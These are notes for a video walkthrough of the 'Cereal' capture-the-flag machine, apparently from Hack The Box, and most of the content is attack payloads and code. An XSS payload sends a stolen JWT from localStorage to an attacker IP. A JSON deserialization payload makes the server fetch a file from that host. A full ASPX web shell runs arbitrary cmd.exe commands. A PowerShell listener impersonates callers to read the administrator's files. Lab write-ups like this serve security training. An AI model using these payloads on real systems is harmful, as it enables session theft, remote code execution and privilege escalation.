
Cereal

Notes for https://youtu.be/tjaW1KC7lBI

GitTools

Auth Fiddle

Steal JWT from Local Storage via XSS

{
"RequestID":1000,
"json":"{\"title\":\"[y](javascript: (function () {window.location.href=\\\"http://10.10.14.91:8000/x\\\"+localStorage.getItem('currentUser');})(););\",\"flavor\":\"x)\",\"color\":\"x\",\"description\":\"x\"}"
}

Deserialization Fiddle

Store Deserialization Payload

{
"RequestId":1001,
"JSON":"{\"$type\":\"Cereal.DownloadHelper, cereal, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\",\"URL\":\"http://10.10.14.91/cmd.aspx\",\"FilePath\":\"c:\\\\inetpub\\\\source\\\\uploads\\\\xct.aspx\"}"
}

Trigger Deserialization Payload via XSS

{
"json":"{\"title\":\"[xhr](javascript:(function () {var x1=new XMLHttpRequest();x1.open('GET','https://cereal.htb/requests/1001');x1.setRequestHeader('Authorization','Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjEiLCJuYmYiOjE2MDYwNTcxMTksImV4cCI6MTkyMTU4OTkxOSwiaWF0IjoxNjA2MDU3MTE5fQ.o9NIIeA9lnbaIopr3y1BlVh46l10OdOIfBX7wyspoBY');x1.withCredentials=true;x1.send();var x2=new XMLHttpRequest();x2.open('GET','https://10.10.14.91:8000/proof');x2.setRequestHeader('Authorization','Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjEiLCJuYmYiOjE2MDYwNTcxMTksImV4cCI6MTkyMTU4OTkxOSwiaWF0IjoxNjA2MDU3MTE5fQ.o9NIIeA9lnbaIopr3y1BlVh46l10OdOIfBX7wyspoBY');x2.withCredentials=true;x2.send();})();)\",\"flavor\":\"x)\",\"color\":\"x\",\"description\":\"x\"}"
}

ASPX Shell

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
// Page lifecycle hook; intentionally empty. All work happens in the
// button's click handler below.
void Page_Load(object sender, EventArgs e)
{
}
// Runs the caller-supplied string through "cmd.exe /c" and returns what the
// command wrote to stdout. `arg` is not validated or constrained in any way.
// From a defensive standpoint this is the classic web-shell signature: the
// ASP.NET worker process spawning cmd.exe with request-controlled arguments.
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
// Only stdout is redirected; stderr is not captured, so error text from the
// command never reaches the returned string.
psi.RedirectStandardOutput = true;
// Required for stream redirection to take effect.
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
// Blocks until the child closes stdout (usually on exit).
string s = stmrdr.ReadToEnd();
stmrdr.Close();
// `p` is never waited on or disposed; the Process handle is left to the GC.
return s;
}
// Click handler for the "excute" button: executes the text box contents and
// echoes the result. Server.HtmlEncode only keeps the output from being
// rendered as markup; it does nothing to limit the command being run.
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!-- http://michaeldaw.org 04/2007 -->

Impersonation PowerShell Webserver

# Loads System.Web; nothing in the script below visibly uses it.
[System.Reflection.Assembly]::LoadWithPartialName("System.Web")
# Loopback-only HttpListener on port 7000.
$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add("http://localhost:7000/")
# Integrated Windows auth means every accepted request carries the caller's
# Windows identity, which is what Impersonate() below relies on.
$listener.AuthenticationSchemes = [System.Net.AuthenticationSchemes]::IntegratedWindowsAuthentication
$listener.Start()
do {
Write-Host "Listening..."
# Blocks until a request arrives.
$context = $listener.GetContext()
# Captured but never used below.
$requestUrl = $context.Request.Url
$response = $context.Response
# Switches the current thread to the authenticated caller's identity. The
# returned impersonation context is discarded, so Undo() is never called and
# the thread presumably stays impersonated after this request is handled.
$context.User.Identity.Impersonate()
$Content = ""
try{
# run any command as admin here
# NOTE(review): `type` writes to the pipeline/console, not to $Content, so
# the file contents are not what ends up in the HTTP response body.
type C:\users\administrator\desktop\root.txt
} catch [System.UnauthorizedAccessException] {
$response.StatusCode = 401
$Content = [System.Text.Encoding]::UTF8.GetBytes("")
} catch [System.Management.Automation.ItemNotFoundException] {
$response.StatusCode = 404
$Content = [System.Text.Encoding]::UTF8.GetBytes("")
} catch {
# Emits the error record to the pipeline, then builds a text body from it.
$_
$Content = "$($_.InvocationInfo.MyCommand.Name) : $($_.Exception.Message)"
$Content += "$($_.InvocationInfo.PositionMessage)"
$Content += " + $($_.CategoryInfo.GetMessage())"
$Content += " + $($_.FullyQualifiedErrorId)"
$Content = [System.Text.Encoding]::UTF8.GetBytes($Content)
$response.StatusCode = 500
}
# Only the catch branches convert $Content to a byte array; on the success
# path it is still the empty string from above.
$response.ContentLength64 = $Content.Length
$response.OutputStream.Write($Content, 0, $Content.Length)
$response.Close()
Start-Sleep -Seconds 1
} while ($listener.IsListening)